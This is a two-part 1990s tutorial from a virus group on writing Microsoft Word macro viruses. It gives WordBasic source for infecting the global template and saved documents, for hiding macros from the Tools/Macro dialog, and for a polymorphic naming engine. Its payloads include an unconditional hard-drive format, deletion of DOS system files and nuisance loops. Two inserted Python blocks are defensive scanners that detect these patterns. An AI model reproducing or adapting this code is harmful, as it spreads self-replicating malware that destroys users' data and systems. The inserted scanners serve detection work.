VX Heaven

The macro virus writing tutorial

Dark Night
1996


Legalese

I shall not be held responsible for any damage created by direct or indirect use of the publicised material. This document is copyright 1996 to me, Dark Night of VBB. Herewith I grant anybody license to redistribute this document as long as it is kept in whole and my copyright notice is not removed. Also if I find any lamers who just take the code published here and say it is their own I will see that they'll be punished. (Believe it or not :-))!!!

Introduction

Many of you may be wondering right now who the hell I am and who VBB is. Come on lamers! Get alive. VBB is one of the coolest virus groups around. You can't tell me you've never heard of us. Well, Ok I'll admit it. We're not that popular yet, but that'll come. So for now here's my contribution to the group as the leader. Welcome to the macro virus writing tutorial part 1.

Enjoy!!

The tools

First of all you'll need MS Word 6.0 or up (duh), then you may want to get VBB's macro disassembler by Aurodreph so that you can study encrypted macros. Also you should make back-ups of your NORMAL.DOT template in your WINWORD6\TEMPLATE\ directory, as this is the document commonly infected by macro virii. So watch out. Also I recommend having at least a small knowledge of Word Basic, so that you kind of know what's going on. Well, that's it. You've made it this far. It's now time to get into the macro virus generals.

The general stuff

Most macro virii have a pretty set structure. They start off with an auto-executing macro which infects the normal.dot (global) template. Then they have some macros which will infect the files on certain actions, for example FileSaveAs, FileSave, FileOpen, ToolsMacros. Documents are infected by transferring the macros into the document and having them execute the next time the document is opened. The code for the autoexec routine would look something like this:

'ANYTHING AFTER THE ' ARE MY COMMENTS

Sub MAIN
On Error Goto Abort
iMacroCount = CountMacros(0, 0)
'CHECK TO SEE IF INFECTION EXISTS
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
'BY LOOKING FOR THE PAYLOAD MACRO
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
'BUT IF THE FILESAVEAS MACRO EXISTS THEN INFECTION IS
'TOO DIFFICULT.
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoExec and FileSaveAs.
'Payload has no use except to check for infection.
'The ,1 encrypts all macros in their destination making
'them unreadable in Word.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
Macro$ = sMe$ + ":PayLoad"
MacroCopy Macro$, "Global:PayLoad", 1
Macro$ = sMe$ + ":FileOpen"
MacroCopy Macro$, "Global:FileOpen", 1
Macro$ = sMe$ + ":FileSaveAs"
MacroCopy Macro$, "Global:FileSaveAs", 1
Macro$ = sMe$ + ":AutoExec"
MacroCopy Macro$, "Global:AutoExec", 1
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
End If
Abort:
End Sub

The SaveAs routine

This is the routine which copies the macro virus into the active document when it is saved using File/Save As. It uses many of the same techniques as the AutoExec routine. Here's what the code should look like for the SaveAs routine:

'YOU CAN ALWAYS USE THE ,1 AGAIN TO ENCRYPT MACROS.

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs"
MacroCopy "FileSave ", WindowName$() + ":FileSave"
MacroCopy "PayLoad", WindowName$() + ":PayLoad"
MacroCopy "FileOpen", WindowName$() + ":FileOpen"
Dlg.Format = 1
End If
FileDaveAs dlg
End Sub

Short, but it works well. All this info, believe it or not, is enough to make a small and basic macro virus.
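Seen from the defending side, the two listings above reduce to a few static indicators: macros named after auto-run or menu commands, MacroCopy into "Global:", MacroCopy into the open document, and the trailing ,1 that hides the copy. The Python check below is an added example, not part of the original tutorial; it assumes the macro source has already been extracted as text, and the sample macros in it are constructed.

```python
import re

# Auto-run / command-replacing macro names mentioned in this tutorial.
HOOK_NAMES = {"autoexec", "fileopen", "filesave", "filesaveas",
              "toolsmacro", "toolsmacros"}

def scan_macros(macros):
    """macros: {macro name: WordBasic source text}. Returns sorted findings."""
    findings = set()
    for name, source in macros.items():
        if name.lower() in HOOK_NAMES:
            findings.add((name, "hooks auto/command macro name"))
        for line in source.splitlines():
            stripped = line.strip()
            # Skip WordBasic comments so quoted examples do not trigger.
            if stripped.startswith("'") or stripped.upper().startswith("REM "):
                continue
            m = re.match(r"MacroCopy\s+(.*)", stripped, re.I)
            if not m:
                continue
            # Heuristic split: arguments in the listings contain no commas.
            args = [a.strip() for a in m.group(1).split(",")]
            if len(args) < 2:
                continue
            dst = args[1]
            if dst.lower().startswith('"global:'):
                findings.add((name, "copies a macro into the global template"))
            elif re.search(r"(WindowName|FileName)\$\(\)", dst, re.I):
                findings.add((name, "copies a macro into the open document"))
            if len(args) > 2 and args[2] == "1":
                findings.add((name, "copy is made unreadable (,1 flag)"))
    return sorted(findings)

# Constructed sample: only the lines the indicators key on.
SAMPLE = {
    "AutoExec": "Sub MAIN\n'MacroCopy in a comment is ignored\n"
                'MacroCopy Macro$, "Global:FileOpen", 1\nEnd Sub',
    "FileSaveAs": 'Sub MAIN\nMacroCopy "FileSaveAs", '
                  'WindowName$() + ":FileSaveAs"\nEnd Sub',
    "Helper": 'Sub MAIN\nMsgBox "hello"\nEnd Sub',
}

if __name__ == "__main__":
    for macro, reason in scan_macros(SAMPLE):
        print(f"{macro}: {reason}")
```

A template that legitimately customises FileSave will also trip the name check, so the MacroCopy findings are the stronger signal.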

Special routines

There are several methods which can be used to hide your virus or make it more effective. For example, you can make a macro to hide your virus when somebody looks in tools/macro. The code should look something like this:

Sub MAIN
On Error Goto ErrorRoutine

OldName$ = NomFichier$()

If macros.bDebug Then
MsgBox "start ToolsMacro"
Dim dlg As OutilsMacro
If macros.bDebug Then MsgBox "1"
GetCurValues dlg
If macros.bDebug Then MsgBox "2"
On Error Goto Skip
Dialog dlg
OutilsMacro dlg
Skip:
On Error Goto ErrorRoutine
End If

REM enable automacros
DisableAutoMacros 0

macros.SavToGlobal(OldName$)
macros.objectiv
Goto Done

ErrorRoutine:
On Error Goto Done
If macros.bDebug Then
MsgBox "error " + Str$(Err) + " occurred"
End If

Done:
End Sub

Also you can include external subroutines. For example, the nuclear virus tries to compile and run an external file-infector virus. Or some macro trojans try to format your hard drive when you open a document. An example subroutine for an unconditional format would be this:

sCmd$ = "echo y|format c: /u"
Shell Environment$ ("COMSPEC") + "/c" + sCmd$, 0

ALSO YOU MAY WANT TO PUT A PASSWORD ONTO THE DOCUMENT THAT YOU'VE JUST
INFECTED OR WHEN YOU HAVE EXPERIENCED AN ERROR WHILE INFECTING AND THE
CURRENT SECOND IS 13. TAKE A LOOK AT THIS EXAMPLE:

Sub MAIN
On Error Goto ByeBye

.
. 'Infection code
.
.
.
\/

ByeBye:
If (second(Now()) = 13) Then
Dlg.Password = "Dark_Night" 'SETS PASSWORD TO DARK_NIGHT. YOU CAN
'ALSO SET A RANDOM PASSWORD CODE SHALL
'PRESENTED IN NEXT INSTALLMENT! :-D

Your work

I have explained the basic knowledge you need to have to start writing your macro virus. If anybody responds to this tutorial, then I will go into more details about the different structures and possibilities of macro virii.

Interested?

I have no idea if anybody would be interested if I continue this tutorial. So to not make myself do all the work for nothing, I request that you please drop me an e-mail if you would be interested in any further explanation of macro virii. I will then gladly continue this tutorial of macro virii for you. My address is:

[email protected]

Dark Night

Part 2

Legalese

I shall not be held responsible for any damage created by direct or indirect use of the publicised material. This document is copyright 1997 to me, Dark Night of VBB. Herewith I grant anybody license to redistribute this document as long as it is kept in whole and my copyright notice is not removed. Also if I find any lamers who just take the code published here and say it is their own I will see that they'll be punished. (Sure.....Sure :-))!!!

Intro to life

Yep, it's time again for another tutorial! I got so much positive feedback (and these people wouldn't leave me alone) so I decided to continue. This time I will mostly be talking about virus payloads as I presented the infection routines to you last time.... Oh yeah! The question about books on Word Basic reached me a lot of times too! Here's a book I've been told is supposed to be good: "BEGINNING WORDBASIC PROGRAMMING", ISBN: #1874416869. Enjoy!

Payload?? I'm lost!

Why are you reading this then? The Payload is the bomb....The thing that does stuff besides infecting....

What is possible?

Well, there are a lot of things you can do... You can format harddrives, Crash word, Run other proggies (dos virii) etc. But, you don't want your virus to do this every single time it is run right? So you need a check routine:

If Month(Now()) = 1 And Day(Now()) = 3 Then 'Easy right?
BOMB HERE

ELSE
'whatever

End IF

The easiest method to annoy a user is to send the following very frequently:

SendKeys "%"+"{F4}"

This has the effect of pressing alt+f4...The problem is that word still prompts to save. Since we are in the annoying stuff right now, there is another one:

Again:
MsgBox"HAHAHAHAHA!"
Goto Again

Mean isn't it....Imagine someone working and this thing popping up one day when he opens your word document. Since his template was infected, he will see this more often :)

Mean stuff

Ok, you can get a good kick out of the above, but what if you really want to get someone? Yes, you guessed it... There's even meaner stuff :)

ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Cancel", .Remove, .Context = 0
'The above macro looks handy for the close all function :) (To all who don't understand: It
'removes the cancel button!)

Kill"C:\Autoexec.bat"
Kill"C:\Config.sys"
Kill"C:\Command.com"
Kill"C:\io.sys"
Kill"C:\msdos.sys"
Finish:

Ain't this mean :) I got the next one from the Nightmare Joker. Enjoy....

ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Cancel", .Remove, .Context = 0

SendKeys "^" + "%" + "-"

Close all documents and look under File....How's your Cursor doin'?

Polymorphic??

Yes, it is possible.... Here's a polymorphic engine which uses random names for its macros to hide its identity. This code is from The Nightmare Joker! I translated it into English:

Sub MAIN
On Error Goto Done

A$ = FileName$()
If A$ = "" Then Goto Finish

If VInstalled = 0 Then
Run1
Run2
FileSaveAll 1, 1
Else
Goto Done
End If

Done:
A$ = FileName$()
If A$ = "" Then
Goto Finish
Else
Insert " "
End If

Finish:
MsgBox "polymorph", - 8
End Sub

Sub Run1
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

R1$ = GetDocumentVar$("VirNameDoc")
CO$ = FileName$() + ":" + R1$
MacroCopy CO$, "Global:" + Z$
SetProfileString "Intl", "Info2", Z$
ToolsCustomizeKeyboard .KeyCode = 65, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub

Sub Run2
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

R2$ = GetDocumentVar$("VirName")
OC$ = FileName$() + ":" + R2$
MacroCopy OC$, "Global:" + Z$
SetProfileString "Intl", "Info1", Z$
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub

Function VInstalled
CC$ = GetProfileString$("Intl", "Info1")
VInstalled = 0
If CountMacros(0) > 0 Then
For i = 1 To CountMacros(0)
If MacroName$(i, 0) = CC$ Then
VInstalled = 1
End If
Next i
End If
End Function

Function Fun$(F$, G$, H$, J$)
One = 1169
Two = 9294
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

B$ = Mid$(A$, 1, 1)
C$ = Mid$(A$, 2, 1)
D$ = Mid$(A$, 3, 1)
E$ = Mid$(A$, 4, 1)

If B$ = "1" Then F$ = "A"
If B$ = "2" Then F$ = "B"
If B$ = "3" Then F$ = "C"
If B$ = "4" Then F$ = "D"
If B$ = "5" Then F$ = "E"
If B$ = "6" Then F$ = "F"
If B$ = "7" Then F$ = "G"
If B$ = "8" Then F$ = "H"
If B$ = "9" Then F$ = "I"
If B$ = "0" Then F$ = "J"

If C$ = "1" Then G$ = "H"
If C$ = "2" Then G$ = "I"
If C$ = "3" Then G$ = "J"
If C$ = "4" Then G$ = "K"
If C$ = "5" Then G$ = "L"
If C$ = "6" Then G$ = "M"
If C$ = "7" Then G$ = "N"
If C$ = "8" Then G$ = "O"
If C$ = "9" Then G$ = "P"
If C$ = "0" Then G$ = "Q"

If D$ = "1" Then H$ = "A"
If D$ = "2" Then H$ = "B"
If D$ = "3" Then H$ = "C"
If D$ = "4" Then H$ = "D"
If D$ = "5" Then H$ = "E"
If D$ = "6" Then H$ = "F"
If D$ = "7" Then H$ = "G"
If D$ = "8" Then H$ = "H"
If D$ = "9" Then H$ = "I"
If D$ = "0" Then H$ = "J"

If E$ = "1" Then J$ = "R"
If E$ = "2" Then J$ = "S"
If E$ = "3" Then J$ = "T"
If E$ = "4" Then J$ = "U"
If E$ = "5" Then J$ = "V"
If E$ = "6" Then J$ = "W"
If E$ = "7" Then J$ = "X"
If E$ = "8" Then J$ = "Y"
If E$ = "9" Then J$ = "Z"
If E$ = "0" Then J$ = "Q"

Fun$ = F$ + G$ + H$ + J$
End Function

I'm going to leave you without explanation at this point because if you have no idea what this is about, then this is nothing for you as a beginner!
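The "random" names in the listing above are far from arbitrary: Fun$ turns a number between 1169 and 9293 into four letters through fixed per-position tables, two such halves are joined into an eight-letter name, and the names are written to the "Intl" profile section under Info1 and Info2. The Python check below is an added example, not part of the original tutorial or of the quoted engine; it inverts those tables to test whether a macro name could have come from this generator, and it assumes the macro names and the two profile values have already been collected (the sample values are constructed).

```python
# Letter table per position, indexed by digit, read off the Fun$ listing.
ALPHABETS = ("JABCDEFGHI", "QHIJKLMNOP", "JABCDEFGHI", "QRSTUVWXYZ")
LOW, HIGH = 1169, 9293  # range of Int(Rnd() * (9294 - 1169) + 1169)

def decode_half(half):
    """Return the number a 4-letter half encodes, or None if impossible."""
    if len(half) != 4:
        return None
    digits = ""
    for letter, alphabet in zip(half.upper(), ALPHABETS):
        pos = alphabet.find(letter)
        if pos < 0:
            return None
        digits += str(pos)
    number = int(digits)
    return number if LOW <= number <= HIGH else None

def is_generated_name(name):
    """True if both halves of an 8-letter name decode to an in-range number."""
    return (len(name) == 8
            and decode_half(name[:4]) is not None
            and decode_half(name[4:]) is not None)

def suspicious_macros(macro_names, intl_profile):
    """intl_profile: dict holding the Info1/Info2 values of the Intl section."""
    recorded = {value.upper() for key, value in intl_profile.items()
                if key in ("Info1", "Info2")}
    hits = []
    for name in macro_names:
        reasons = []
        if is_generated_name(name):
            reasons.append("matches generator alphabet")
        if name.upper() in recorded:
            reasons.append("recorded under Intl Info1/Info2")
        if reasons:
            hits.append((name, reasons))
    return hits

if __name__ == "__main__":
    # Constructed sample inputs.
    names = ["AutoOpen", "AHFZIIIT", "DKCTBPGX"]
    print(suspicious_macros(names, {"Info1": "AHFZIIIT"}))
```

A name that matches both checks is a much stronger indicator than the alphabet match alone, since an ordinary eight-letter macro name can fit the tables by chance.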

Where to?

I don't know when I will continue this, but I'm sure that if there is any news I will gladly continue. As usual you can reach me at [email protected] with any questions! Also I would appreciate any future topic suggestions!
